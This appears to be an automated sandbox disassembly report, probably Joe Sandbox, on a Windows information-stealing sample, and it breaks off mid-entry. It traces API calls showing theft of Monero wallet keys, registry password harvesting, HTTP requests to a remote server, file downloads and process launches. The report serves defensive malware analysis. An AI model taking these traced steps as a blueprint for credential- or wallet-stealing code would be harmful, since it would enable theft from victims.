                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00832A10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                  • memset.MSVCRT ref: 00401516
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                  • API String ID: 1930502592-218353709
                                                  • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                  • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0086C060), ref: 00406303
                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0086B718,00000000,00000000,00400100,00000000), ref: 00406385
                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                  • API String ID: 3532888709-1526165396
                                                  • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                  • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                  • StrCmpCA.SHLWAPI(?,0086C060), ref: 00406147
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                  • String ID: a+A$a+A
                                                  • API String ID: 4287319946-2847607090
                                                  • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                  • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • memset.MSVCRT ref: 00B30E83
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                  • lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B30EEF
                                                  • lstrcat.KERNEL32(?,00420D84), ref: 00B30F01
                                                  • lstrlen.KERNEL32(?), ref: 00B30F0E
                                                  • memset.MSVCRT ref: 00B30F34
                                                  • memset.MSVCRT ref: 00B30F48
                                                    • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                    • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                    • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B39927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B30DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B39948
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B30FC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B30FCD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID:
                                                  • API String ID: 1395395982-0
                                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                  • Instruction ID: 078b8227323d7ce072172e9a6f224f058a06a76a9eda6bbfc69caa513aba8b88
                                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                  • Instruction Fuzzy Hash: B181C8B55002186BCB14FBA0DD92FED77B9AF44704F6041E8B34566092EF746B88CF5A
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • memset.MSVCRT ref: 00B30E83
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                  • lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B30EEF
                                                  • lstrcat.KERNEL32(?,00420D84), ref: 00B30F01
                                                  • lstrlen.KERNEL32(?), ref: 00B30F0E
                                                  • memset.MSVCRT ref: 00B30F34
                                                  • memset.MSVCRT ref: 00B30F48
                                                    • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                    • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                    • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B39927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B30DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B39948
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B30FC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B30FCD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID:
                                                  • API String ID: 1395395982-0
                                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                  • Instruction ID: 179be65b2f9b5934b8b66c3e32d475b3c9dc31cfff57507803a876e3c240b3bf
                                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                  • Instruction Fuzzy Hash: 9861D5B5500218ABCB14EBA0CD86FED77B8AF44704F6041E9F74566092EF702B88CF5A
                                                  APIs
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                    • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                    • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B24B7C
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B24BA1
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B24D21
                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 00B2504F
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B2506B
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B2507F
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B250B0
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B25114
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B2512C
                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B24D7C
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B25136
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                  • String ID:
                                                  • API String ID: 2402878923-0
                                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                  • Instruction ID: 828ff600b8ed1b9be05a2547ea1ef62d3a7b78ea93cf9cc4de2f514b51a24167
                                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                  • Instruction Fuzzy Hash: E712BC72910218ABCB15EB90DD92EEEB7B9AF16701F7051D9B14672091EF702F88CF52
                                                  APIs
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                    • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                    • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B26548
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B2656A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B2659C
                                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B265EC
                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B26626
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B26638
                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B26664
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B266D4
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B26756
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B26760
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B2676A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                  • String ID:
                                                  • API String ID: 3074848878-0
                                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                  • Instruction ID: 4d777138341f61c41cf6df43609235864ae8b5739696a23cef825e035e4c1199
                                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                  • Instruction Fuzzy Hash: 1F714F75A40218ABDB24DFA0DC89BEE77B5FB45700F204199F50A6B190DBB46E84CF42
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B392D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateGlobalStream
                                                  • String ID:
                                                  • API String ID: 2244384528-0
                                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                  • Instruction ID: 5966374d502412c3292cc96ae32d5b4054e6d03e6b401c452cff03511bd92a72
                                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                  • Instruction Fuzzy Hash: 12710AB9A40208ABDB14EFE4DC89FEEB7B9FF49300F108548F515A7294DB74A905CB61
                                                  APIs
                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                  • memset.MSVCRT ref: 0041716A
                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                  Strings
                                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                                  • sA, xrefs: 00417111
                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcesslstrcpymemset
                                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                  • API String ID: 224852652-2614523144
                                                  • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                  • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B377A9
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B377E6
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3786A
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B37871
                                                  • wsprintfA.USER32 ref: 00B378A7
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                  • String ID: :$C$\$B
                                                  • API String ID: 1544550907-183544611
                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction ID: 2fb5902c9d1cdd5ad8ccdf01bb722070bbb23491073ea4392684e78739ec770e
                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction Fuzzy Hash: 684182B1D44258EBDB10DF94CC85BEEBBB9EF48700F200199F505A7280DB756A84CBA6
                                                  APIs
                                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                  • task.LIBCPMTD ref: 004076FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                  • String ID: :
                                                  • API String ID: 3191641157-3653984579
                                                  • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
